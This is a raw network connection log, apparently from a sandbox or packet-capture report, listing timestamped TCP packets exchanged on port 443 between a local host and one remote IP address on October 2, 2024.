Oct 2, 2024 05:28:18.047137976 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.047147036 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.047190905 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.097275972 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.097294092 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.097412109 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.097421885 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.097465038 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.098001003 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.098022938 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.098077059 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.098083973 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.098119974 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.098385096 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.098398924 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.098439932 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.098447084 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.098474979 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.098494053 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.105600119 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.105623007 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.105683088 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.105683088 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.105691910 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.105731964 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.105974913 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.105990887 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.106045008 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.106053114 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.106091022 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.106410980 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.106435061 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.106467009 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.106472969 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.106502056 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.106511116 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.131282091 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.131299019 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.131355047 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.131362915 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.131409883 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.134212017 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.134227991 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.134277105 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.134284973 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.134322882 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.184268951 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.184290886 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.184365034 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.184390068 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.184437990 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.184928894 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.184946060 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.185004950 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.185013056 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.185050011 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.185225010 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.185250044 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.185281038 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.185288906 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.185318947 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.185338020 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.185858011 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.185874939 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.185925007 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.185930967 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.186022043 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.186233997 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.186249971 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.186297894 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.186306000 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.186347008 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.186728954 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.186747074 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.186796904 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.186805010 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.186845064 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.218151093 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.218172073 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.218343973 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.218355894 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.218399048 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.221143007 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.221158028 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.221214056 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.221223116 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.221276045 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.271354914 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.271378994 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.271539927 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.271559000 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.271600008 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.271783113 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.271796942 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.271847963 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.271856070 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.271895885 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.272135019 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.272150993 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.272237062 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.272243977 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.272294998 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.272799015 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.272813082 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.272864103 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.272871017 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.272902012 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.273322105 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.273338079 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.273396015 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.273402929 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.273441076 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.273729086 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.273745060 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.273793936 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.273802042 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.273842096 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.305037022 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.305053949 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.305124044 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.305135965 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.305179119 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.308063030 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.308078051 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.308116913 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.308125019 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.308156967 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.308166027 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.358355045 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.358376980 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.358462095 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.358472109 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.358520985 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.358762980 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.358778954 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.358839035 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.358845949 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.358892918 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.359163046 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.359181881 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.359241009 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.359250069 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.359287024 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.359622955 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.359638929 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.359700918 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.359708071 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.359747887 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.360272884 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.360289097 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.360337973 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.360346079 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.360383987 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.360749006 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.360764027 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.360804081 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.360810041 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.360835075 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.360847950 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.392185926 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.392204046 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.392287016 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.392301083 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.392343044 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.395066977 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.395087957 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.395138025 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.395147085 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.395193100 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.445214033 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.445235014 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.445332050 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.445354939 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.445404053 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.445632935 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.445647955 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.445700884 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.445710897 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.445756912 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.445991993 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.446006060 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.446047068 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.446053982 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.446089029 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.446113110 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.446494102 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.446511030 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.446556091 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.446563005 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.446593046 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.446620941 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.447180986 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.447195053 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.447230101 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.447237015 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.447268963 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.447288990 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.447618961 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.447634935 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.447689056 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.447695971 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.447737932 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.479268074 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.479285002 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.479373932 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.479387999 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.479433060 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.482095957 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.482110977 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.482188940 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.482198000 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.482240915 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.532339096 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.532358885 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.532458067 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.532474041 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.532520056 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.532604933 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.532620907 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.532675028 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.532681942 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.532748938 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.533058882 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.533075094 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.533118963 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.533127069 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.533164024 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.533190012 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.533507109 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.533523083 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.533577919 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.533585072 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.533629894 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.534183979 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.534198046 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.534241915 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.534248114 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.534277916 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.534301996 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.534578085 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.534595013 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.534648895 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.534657001 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.534698009 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.566147089 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.566180944 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.566298962 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.566312075 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.566355944 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.568893909 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.568911076 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.568994999 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.569004059 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.569046021 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.619343996 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.619360924 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.619441032 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.619451046 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.619507074 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.619776011 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.619792938 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.619851112 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.619858980 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.619885921 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.619910955 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.620269060 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.620289087 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.620342016 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.620348930 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.620404005 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.620546103 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.620564938 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.620605946 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.620613098 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.620641947 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.620665073 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.621144056 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.621164083 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.621207952 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.621212959 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.621248007 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.621268034 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.621640921 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.621661901 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.621699095 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.621705055 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.621741056 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.621779919 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.653023958 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.653048992 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.653173923 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.653182030 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.653232098 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.655802965 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.655828953 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.655920982 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.655930996 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.655973911 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.706995010 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.707020044 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.707132101 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.707143068 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.707190990 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.707288027 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.707307100 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.707360983 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.707369089 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.707411051 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.707753897 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.707779884 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.707814932 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.707820892 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.707840919 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.707861900 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.708164930 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.708184004 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.708229065 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.708236933 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.708273888 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.708600998 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.708619118 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.708662987 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.708669901 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.708707094 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.709007978 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.709032059 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.709072113 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.709079981 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.709115982 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.740031004 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.740056992 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.740128994 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.740138054 CEST	443	49711	207.241.227.240	192.168.2.6
